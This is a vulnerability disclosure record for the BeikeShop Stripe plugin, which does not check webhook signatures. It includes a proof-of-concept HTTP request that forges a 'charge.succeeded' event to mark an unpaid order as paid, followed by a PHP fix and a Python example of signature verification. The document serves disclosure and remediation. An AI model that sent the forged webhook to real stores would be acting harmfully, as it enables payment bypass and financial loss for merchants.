| Title | BeikeShop 1.6.0 Design/Logic Flaw |
|---|
| Description | 1. TITLE
BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass
2. PRODUCT
BeikeShop
3. VENDOR
BeikeShop / Guangda
4. VERSION
<= 1.6.0
5. CWE
CWE-347: Improper Verification of Cryptographic Signature
6. CVSS 3.1
7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
7. CATEGORY
Web Application / Payment Gateway
8. SUMMARY
The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment.
9. VULNERABLE CODE
File: `plugins/Stripe/Controllers/StripeController.php`
The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header.
10. PROOF OF CONCEPT
```http
POST /callback/stripe HTTP/1.1
Host: TARGET
Content-Type: application/json

{
  "type": "charge.succeeded",
  "data": {
    "object": {
      "metadata": {
        "order_number": "KNOWN-ORDER-NUMBER"
      }
    }
  }
}
```
Response:
```json
{"status":"success","message":"Capture Successfully"}
```
Result:
`orders.status` changes from `unpaid` to `paid`.
11. IMPACT
* Unauthorized order state manipulation
* Payment bypass
* Inventory deduction for unpaid orders
* Integrity impact on order and sales data
* Potential financial loss
12. SOLUTION
Implement Stripe webhook signature verification before processing webhook events:
```php
// Verify against the raw body: the signature covers the exact bytes Stripe sent,
// so the re-serialised, attacker-controlled $request->all() must not be used here.
$payload   = $request->getContent();
$sigHeader = $request->header('Stripe-Signature', '');
$secret    = plugin_setting('stripe.webhook_secret');

try {
    $event = \Stripe\Webhook::constructEvent($payload, $sigHeader, $secret);
} catch (\UnexpectedValueException | \Stripe\Exception\SignatureVerificationException $e) {
    // Malformed payload or missing/invalid signature: reject before touching any order
    return response()->json(['status' => 'fail', 'message' => 'Invalid signature'], 400);
}

// Only now is $event trustworthy; dispatch on $event->type (e.g. charge.succeeded)
```
Reject webhook requests when signature verification fails.
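As an added example that is not BeikeShop's or Stripe's own code, the following Python re-implements the check that `\Stripe\Webhook::constructEvent()` performs (HMAC-SHA256 over `<timestamp>.<raw body>` keyed with the endpoint secret, plus a replay window) and runs a hardened version of the callback against an unsigned request shaped like the PoC above. The secret, order number and timestamps are constructed sample values; the `run_scenario` helper and the 300-second tolerance (the Stripe SDK default) are assumptions of the example.

```python
import hashlib
import hmac
import json
TOLERANCE_SECONDS = 300  # replay window; the Stripe SDK's default
SECRET = "whsec_constructed_example_secret"  # constructed sample endpoint secret, not a real one
# Constructed body with the same shape as the advisory's PoC request
FORGED = json.dumps({"type": "charge.succeeded", "data": {"object": {"metadata": {"order_number": "ORD-1001"}}}}).encode()
def _mac(secret, payload, timestamp):
    """HMAC-SHA256 over "<timestamp>.<raw body>", keyed with the endpoint secret (Stripe's signed payload)."""
    return hmac.new(secret.encode(), f"{timestamp}.".encode() + payload, hashlib.sha256).hexdigest()

def sign_payload(secret, payload, timestamp):
    """Stripe-Signature header value as the genuine sender would emit it."""
    return f"t={timestamp},v1={_mac(secret, payload, timestamp)}"

def verify_webhook(secret, payload, sig_header, now):
    """Return the parsed event only if the signature is valid and fresh; raise ValueError otherwise."""
    if not sig_header:
        raise ValueError("missing Stripe-Signature header")
    timestamp, candidates = None, []
    for item in sig_header.split(","):
        key, _, value = item.strip().partition("=")
        if key == "t":
            timestamp = int(value)
        elif key == "v1":  # several v1 values may be present during secret rotation
            candidates.append(value)
    if timestamp is None or not candidates:
        raise ValueError("malformed Stripe-Signature header")
    expected = _mac(secret, payload, timestamp)
    if not any(hmac.compare_digest(expected, c) for c in candidates):
        raise ValueError("signature mismatch")
    if abs(now - timestamp) > TOLERANCE_SECONDS:
        raise ValueError("timestamp outside tolerance window")
    return json.loads(payload)

def handle_callback(secret, payload, sig_header, order_status, now):
    """Hardened callback: only a verified charge.succeeded event may mark an order paid."""
    try:
        event = verify_webhook(secret, payload, sig_header, now)
    except ValueError as exc:
        return {"status": "fail", "message": str(exc), "http": 400}
    if event.get("type") == "charge.succeeded":
        order_status[event["data"]["object"]["metadata"]["order_number"]] = "paid"
    return {"status": "success", "message": "Capture Successfully", "http": 200}

def run_scenario(secret, payload, sig_header, now):
    """Feed one request to the hardened callback against a fresh unpaid order; return (http, order status)."""
    orders = {"ORD-1001": "unpaid"}
    return handle_callback(secret, payload, sig_header, orders, now)["http"], orders["ORD-1001"]
```

An unsigned body, a body signed with the wrong secret, a replayed header and a tampered body all leave the order `unpaid`; only a fresh, correctly signed event flips it to `paid`.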
13. AUTHENTICATION
None required
14. USER INTERACTION
None required |
|---|
| Source | https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md |
|---|
| User | Fklov (UID 98102) |
|---|
| Submitted | 2026-05-16 11:06 (24 days ago) |
|---|
| Moderation | 2026-06-07 09:32 (22 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 369082 [Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22 Stripe Plugin StripeController.php callback request privilege escalation] |
|---|
| Points | 20 |
|---|